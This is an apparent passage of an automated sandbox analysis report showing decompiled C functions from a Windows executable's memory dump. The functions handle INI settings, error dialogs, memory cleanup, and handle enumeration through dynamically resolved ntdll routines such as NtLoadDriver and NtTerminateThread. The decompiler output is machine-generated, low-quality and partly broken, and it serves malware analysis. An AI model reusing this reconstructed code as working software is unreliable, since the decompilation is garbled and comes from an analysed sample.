                                                                                                  • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 16%
                                                                                                  			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                                  				signed short _v131076;
                                                                                                  
                                                                                                  				_t25 = __esi;
                                                                                                  				E0040B550(0x20000, __ecx);
                                                                                                  				if(_a4 == 0) {
                                                                                                  					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                                                  				} else {
                                                                                                  					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                                  						_push(_a24);
                                                                                                  					} else {
                                                                                                  						_v131076 = _v131076 & 0x00000000;
                                                                                                  						_push(__esi);
                                                                                                  						_push(L"\"%s\"");
                                                                                                  						_push(0xfffe);
                                                                                                  						_push( &_v131076);
                                                                                                  						L0040B1EC();
                                                                                                  						_push(_a24);
                                                                                                  						_push( &_v131076);
                                                                                                  					}
                                                                                                  					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                                  				}
                                                                                                  			}




                                                                                                  0x00409d5f
                                                                                                  0x00409d67
                                                                                                  0x00409d70
                                                                                                  0x00409ddb
                                                                                                  0x00409d72
                                                                                                  0x00409d74
                                                                                                  0x00409db2
                                                                                                  0x00409d84
                                                                                                  0x00409d84
                                                                                                  0x00409d8c
                                                                                                  0x00409d8d
                                                                                                  0x00409d98
                                                                                                  0x00409d9d
                                                                                                  0x00409d9e
                                                                                                  0x00409da6
                                                                                                  0x00409daf
                                                                                                  0x00409daf
                                                                                                  0x00409dc3
                                                                                                  0x00409dc3

                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 00409D79
                                                                                                  • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                  • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                  • String ID: "%s"
                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                  • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                  • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                  • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                  • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 38%
                                                                                                  			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                  				char _v2052;
                                                                                                  				short _v4100;
                                                                                                  				void* __edi;
                                                                                                  				long _t15;
                                                                                                  				long _t16;
                                                                                                  
                                                                                                  				_t15 = __ecx;
                                                                                                  				E0040B550(0x1000, __ecx);
                                                                                                  				_t16 = _t15;
                                                                                                  				if(_t16 == 0) {
                                                                                                  					_t16 = GetLastError();
                                                                                                  				}
                                                                                                  				E00404706(_t16,  &_v2052);
                                                                                                  				_push( &_v2052);
                                                                                                  				_push(_t16);
                                                                                                  				_push(L"Error %d: %s");
                                                                                                  				_push(0x400);
                                                                                                  				_push( &_v4100);
                                                                                                  				L0040B1EC();
                                                                                                  				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                  			}








                                                                                                  0x004047d2
                                                                                                  0x004047da
                                                                                                  0x004047e0
                                                                                                  0x004047e4
                                                                                                  0x004047ec
                                                                                                  0x004047ec
                                                                                                  0x004047f5
                                                                                                  0x00404800
                                                                                                  0x00404801
                                                                                                  0x00404802
                                                                                                  0x0040480d
                                                                                                  0x00404812
                                                                                                  0x00404813
                                                                                                  0x00404834

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                  • _snwprintf.MSVCRT ref: 00404813
                                                                                                  • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                  • String ID: Error$Error %d: %s
                                                                                                  • API String ID: 313946961-1552265934
                                                                                                  • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                  • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                  • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                  • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                                  				void* _v8;
                                                                                                  				signed int _v12;
                                                                                                  				void* __ebx;
                                                                                                  				void* __ecx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t74;
                                                                                                  				signed int _t76;
                                                                                                  				signed short _t85;
                                                                                                  				signed int _t87;
                                                                                                  				intOrPtr _t88;
                                                                                                  				signed short _t93;
                                                                                                  				void* _t95;
                                                                                                  				signed int _t124;
                                                                                                  				signed int _t126;
                                                                                                  				signed int _t128;
                                                                                                  				intOrPtr* _t131;
                                                                                                  				signed int _t135;
                                                                                                  				signed int _t137;
                                                                                                  				signed int _t138;
                                                                                                  				void* _t141;
                                                                                                  				void* _t142;
                                                                                                  				void* _t146;
                                                                                                  
                                                                                                  				_t142 = __eflags;
                                                                                                  				_push(_t102);
                                                                                                  				_t131 = __eax;
                                                                                                  				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                                                  				E00406746(__eax);
                                                                                                  				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                                                  				_t135 = 5;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                                                  				_t124 = 0x14;
                                                                                                  				_t74 = _t135 * _t124;
                                                                                                  				 *(_t131 + 0x2d0) = _t135;
                                                                                                  				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                                                  				L0040B26C();
                                                                                                  				 *(_t131 + 0x2d4) = _t74;
                                                                                                  				_t126 = 0x14;
                                                                                                  				_t76 = _t135 * _t126;
                                                                                                  				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                                                  				L0040B26C();
                                                                                                  				_t95 = 0x40f008;
                                                                                                  				 *(_t131 + 0x40) = _t76;
                                                                                                  				_v8 = 0x40f008;
                                                                                                  				do {
                                                                                                  					_t137 =  *_t95 * 0x14;
                                                                                                  					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                                                  					_t24 = _t95 + 0x14; // 0x40f01c
                                                                                                  					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                                                  					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                                                  					_t141 = _t141 + 0x18;
                                                                                                  					_v12 = _t85;
                                                                                                  					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                                                  					if((_t85 & 0xffff0000) == 0) {
                                                                                                  						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                                                  						_t93 = E00405B81(_v12 | 0x00010000);
                                                                                                  						_t95 = _v8;
                                                                                                  						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                                                  					}
                                                                                                  					_t95 = _t95 + 0x28;
                                                                                                  					_t146 = _t95 - 0x40f0d0;
                                                                                                  					_v8 = _t95;
                                                                                                  				} while (_t146 < 0);
                                                                                                  				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                                                  				_t138 = 5;
                                                                                                  				_t128 = 4;
                                                                                                  				_t87 = _t138 * _t128;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                                                  				 *(_t131 + 0x2c) = _t138;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                                                  				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                                                  				L0040B26C();
                                                                                                  				_push(0xc);
                                                                                                  				 *(_t131 + 0x30) = _t87;
                                                                                                  				L0040B26C();
                                                                                                  				_t139 = _t87;
                                                                                                  				if(_t87 == 0) {
                                                                                                  					_t88 = 0;
                                                                                                  					__eflags = 0;
                                                                                                  				} else {
                                                                                                  					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                                                  				}
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                                                  				return E0040686C(_t131);
                                                                                                  			}


























                                                                                                  0x004068ec
                                                                                                  0x004068f0
                                                                                                  0x004068f4
                                                                                                  0x004068ff
                                                                                                  0x00406902
                                                                                                  0x0040690a
                                                                                                  0x00406910
                                                                                                  0x00406911
                                                                                                  0x0040691b
                                                                                                  0x0040691e
                                                                                                  0x00406923
                                                                                                  0x0040692d
                                                                                                  0x0040692e
                                                                                                  0x00406933
                                                                                                  0x0040693d
                                                                                                  0x00406940
                                                                                                  0x00406949
                                                                                                  0x0040694a
                                                                                                  0x00406950
                                                                                                  0x00406956
                                                                                                  0x00406959
                                                                                                  0x0040695c
                                                                                                  0x00406964
                                                                                                  0x0040696d
                                                                                                  0x00406974
                                                                                                  0x0040697e
                                                                                                  0x00406989
                                                                                                  0x00406990
                                                                                                  0x00406998
                                                                                                  0x0040699b
                                                                                                  0x0040699f
                                                                                                  0x004069b8
                                                                                                  0x004069bc
                                                                                                  0x004069c4
                                                                                                  0x004069c7
                                                                                                  0x004069c7
                                                                                                  0x004069cb
                                                                                                  0x004069ce
                                                                                                  0x004069d4
                                                                                                  0x004069d4
                                                                                                  0x004069d9
                                                                                                  0x004069df
                                                                                                  0x004069e6
                                                                                                  0x004069ea
                                                                                                  0x004069ef
                                                                                                  0x004069f2
                                                                                                  0x004069f5
                                                                                                  0x00406a00
                                                                                                  0x00406a01
                                                                                                  0x00406a06
                                                                                                  0x00406a08
                                                                                                  0x00406a0b
                                                                                                  0x00406a10
                                                                                                  0x00406a16
                                                                                                  0x00406a25
                                                                                                  0x00406a25
                                                                                                  0x00406a18
                                                                                                  0x00406a1e
                                                                                                  0x00406a1e
                                                                                                  0x00406a27
                                                                                                  0x00406a2f
                                                                                                  0x00406a32
                                                                                                  0x00406a35
                                                                                                  0x00406a3b
                                                                                                  0x00406a41
                                                                                                  0x00406a47
                                                                                                  0x00406a4d
                                                                                                  0x00406a53
                                                                                                  0x00406a5d
                                                                                                  0x00406a6d

                                                                                                  APIs
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                  • memcpy.MSVCRT ref: 0040696D
                                                                                                  • memcpy.MSVCRT ref: 0040697E
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 975042529-0
                                                                                                  • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                  • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                  • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                  • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 83%
                                                                                                  			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                  				int _v8;
                                                                                                  				int _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				void* _v20;
                                                                                                  				int _v24;
                                                                                                  				void _v56;
                                                                                                  				char _v584;
                                                                                                  				char _v588;
                                                                                                  				char _v41548;
                                                                                                  				void* __edi;
                                                                                                  				void* _t40;
                                                                                                  				void _t46;
                                                                                                  				intOrPtr _t47;
                                                                                                  				intOrPtr* _t64;
                                                                                                  				intOrPtr* _t66;
                                                                                                  				intOrPtr _t67;
                                                                                                  				intOrPtr _t71;
                                                                                                  				int _t77;
                                                                                                  				void* _t80;
                                                                                                  				void* _t81;
                                                                                                  				void* _t82;
                                                                                                  				void* _t83;
                                                                                                  
                                                                                                  				E0040B550(0xa248, __ecx);
                                                                                                  				_t77 = 0;
                                                                                                  				_v8 = 0;
                                                                                                  				E00408E31();
                                                                                                  				_t40 =  *0x41c47c;
                                                                                                  				if(_t40 != 0) {
                                                                                                  					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                                                  				}
                                                                                                  				if(_v8 == _t77) {
                                                                                                  					_v8 = 0x186a0;
                                                                                                  				}
                                                                                                  				_v8 = _v8 + 0x3e80;
                                                                                                  				_push(_v8);
                                                                                                  				L0040B26C();
                                                                                                  				_t81 = _t40;
                                                                                                  				_v20 = _t81;
                                                                                                  				memset(_t81, _t77, _v8);
                                                                                                  				_t83 = _t82 + 0x10;
                                                                                                  				_v24 = _t77;
                                                                                                  				E00408E31();
                                                                                                  				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                                                  				L5:
                                                                                                  				while(1) {
                                                                                                  					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                                                  						L16:
                                                                                                  						_t46 =  *_t81;
                                                                                                  						_t77 = 0;
                                                                                                  						if(_t46 == 0) {
                                                                                                  							_push(_v20);
                                                                                                  							L0040B272();
                                                                                                  							return _t46;
                                                                                                  						}
                                                                                                  						_t81 = _t81 + _t46;
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					_t47 = _a4;
                                                                                                  					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                                                  					_v12 = _t77;
                                                                                                  					_v16 = _t71;
                                                                                                  					if(_t71 <= _t77) {
                                                                                                  						L10:
                                                                                                  						_t66 = 0;
                                                                                                  						L11:
                                                                                                  						if(_t66 == 0) {
                                                                                                  							E004090AF( &_v588);
                                                                                                  							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                  							_t32 = _t81 + 0x20; // 0x20
                                                                                                  							memcpy( &_v56, _t32, 8);
                                                                                                  							_t83 = _t83 + 0x10;
                                                                                                  							E004099ED(_a4 + 0x28,  &_v588);
                                                                                                  						} else {
                                                                                                  							_t26 = _t66 + 4; // 0x4
                                                                                                  							_t72 = _t26;
                                                                                                  							if( *_t26 == 0) {
                                                                                                  								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                  								_t28 = _t81 + 0x20; // 0x20
                                                                                                  								memcpy(_t66 + 0x214, _t28, 8);
                                                                                                  								_t83 = _t83 + 0x10;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L16;
                                                                                                  					}
                                                                                                  					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                                                  					_t80 = _t47 + 0x28;
                                                                                                  					while(1) {
                                                                                                  						_t64 = E00405A92(_v12, _t80);
                                                                                                  						if( *_t64 == _t67) {
                                                                                                  							break;
                                                                                                  						}
                                                                                                  						_v12 = _v12 + 1;
                                                                                                  						if(_v12 < _v16) {
                                                                                                  							continue;
                                                                                                  						}
                                                                                                  						goto L10;
                                                                                                  					}
                                                                                                  					_t66 = _t64;
                                                                                                  					goto L11;
                                                                                                  				}
                                                                                                  			}

























                                                                                                  0x004097b1
                                                                                                  0x004097b9
                                                                                                  0x004097bb
                                                                                                  0x004097be
                                                                                                  0x004097c3
                                                                                                  0x004097ca
                                                                                                  0x004097de
                                                                                                  0x004097de
                                                                                                  0x004097e3
                                                                                                  0x004097e5
                                                                                                  0x004097e5
                                                                                                  0x004097ec
                                                                                                  0x004097f3
                                                                                                  0x004097f6
                                                                                                  0x004097fe
                                                                                                  0x00409802
                                                                                                  0x00409805
                                                                                                  0x0040980a
                                                                                                  0x0040980d
                                                                                                  0x00409810
                                                                                                  0x00409822
                                                                                                  0x00000000
                                                                                                  0x00409827
                                                                                                  0x0040982a
                                                                                                  0x004098da
                                                                                                  0x004098da
                                                                                                  0x004098dc
                                                                                                  0x004098e0
                                                                                                  0x004098e9
                                                                                                  0x004098ec
                                                                                                  0x004098f6
                                                                                                  0x004098f6
                                                                                                  0x004098e2
                                                                                                  0x00000000
                                                                                                  0x004098e2
                                                                                                  0x00409830
                                                                                                  0x00409833
                                                                                                  0x00409838
                                                                                                  0x0040983b
                                                                                                  0x0040983e
                                                                                                  0x0040985f
                                                                                                  0x0040985f
                                                                                                  0x00409861
                                                                                                  0x00409863
                                                                                                  0x0040989e
                                                                                                  0x004098b1
                                                                                                  0x004098b8
                                                                                                  0x004098c0
                                                                                                  0x004098c5
                                                                                                  0x004098d5
                                                                                                  0x00409865
                                                                                                  0x00409865
                                                                                                  0x00409865
                                                                                                  0x0040986c
                                                                                                  0x00409878
                                                                                                  0x0040987f
                                                                                                  0x0040988a
                                                                                                  0x0040988f
                                                                                                  0x0040988f
                                                                                                  0x0040986c
                                                                                                  0x00000000
                                                                                                  0x00409863
                                                                                                  0x00409840
                                                                                                  0x00409843
                                                                                                  0x00409846
                                                                                                  0x0040984b
                                                                                                  0x00409852
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409854
                                                                                                  0x0040985d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040985d
                                                                                                  0x00409894
                                                                                                  0x00000000
                                                                                                  0x00409894

                                                                                                  APIs
                                                                                                    • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                  • memset.MSVCRT ref: 00409805
                                                                                                  • memcpy.MSVCRT ref: 0040988A
                                                                                                  • memcpy.MSVCRT ref: 004098C0
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3641025914-0
                                                                                                  • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                  • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                  • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                  • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 68%
                                                                                                  			E004067AC(char** __edi) {
                                                                                                  				void* __esi;
                                                                                                  				void* _t9;
                                                                                                  				void** _t11;
                                                                                                  				char** _t15;
                                                                                                  				char** _t24;
                                                                                                  				void* _t25;
                                                                                                  				char* _t28;
                                                                                                  				char* _t29;
                                                                                                  				char* _t30;
                                                                                                  				char* _t31;
                                                                                                  				char** _t33;
                                                                                                  
                                                                                                  				_t24 = __edi;
                                                                                                  				 *__edi = "cf@";
                                                                                                  				_t9 = E00406746(__edi);
                                                                                                  				_t28 = __edi[5];
                                                                                                  				if(_t28 != 0) {
                                                                                                  					_t9 = E004055D1(_t9, _t28);
                                                                                                  					_push(_t28);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t29 = _t24[4];
                                                                                                  				if(_t29 != 0) {
                                                                                                  					_t9 = E004055D1(_t9, _t29);
                                                                                                  					_push(_t29);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t30 = _t24[3];
                                                                                                  				if(_t30 != 0) {
                                                                                                  					_t9 = E004055D1(_t9, _t30);
                                                                                                  					_push(_t30);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t31 = _t24[2];
                                                                                                  				if(_t31 != 0) {
                                                                                                  					E004055D1(_t9, _t31);
                                                                                                  					_push(_t31);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t15 = _t24;
                                                                                                  				_pop(_t32);
                                                                                                  				_push(_t24);
                                                                                                  				_t33 = _t15;
                                                                                                  				_t25 = 0;
                                                                                                  				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                                                  					do {
                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                                                  						_t25 = _t25 + 1;
                                                                                                  					} while (_t25 < _t33[0xd]);
                                                                                                  				}
                                                                                                  				_t11 =  *( *_t33)();
                                                                                                  				free( *_t11);
                                                                                                  				return _t11;
                                                                                                  			}














                                                                                                  0x004067ac
                                                                                                  0x004067af
                                                                                                  0x004067b5
                                                                                                  0x004067ba
                                                                                                  0x004067bf
                                                                                                  0x004067c1
                                                                                                  0x004067c6
                                                                                                  0x004067c7
                                                                                                  0x004067cc
                                                                                                  0x004067cd
                                                                                                  0x004067d2
                                                                                                  0x004067d4
                                                                                                  0x004067d9
                                                                                                  0x004067da
                                                                                                  0x004067df
                                                                                                  0x004067e0
                                                                                                  0x004067e5
                                                                                                  0x004067e7
                                                                                                  0x004067ec
                                                                                                  0x004067ed
                                                                                                  0x004067f2
                                                                                                  0x004067f3
                                                                                                  0x004067f8
                                                                                                  0x004067fa
                                                                                                  0x004067ff
                                                                                                  0x00406800
                                                                                                  0x00406805
                                                                                                  0x00406806
                                                                                                  0x00406808
                                                                                                  0x0040680f
                                                                                                  0x00406810
                                                                                                  0x00406812
                                                                                                  0x00406817
                                                                                                  0x0040681e
                                                                                                  0x00406828
                                                                                                  0x0040682b
                                                                                                  0x0040682c
                                                                                                  0x0040681e
                                                                                                  0x00406835
                                                                                                  0x00406839
                                                                                                  0x00406841

                                                                                                  APIs
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                  • free.MSVCRT(00000000), ref: 00406839
                                                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??3@$free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2241099983-0
                                                                                                  • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
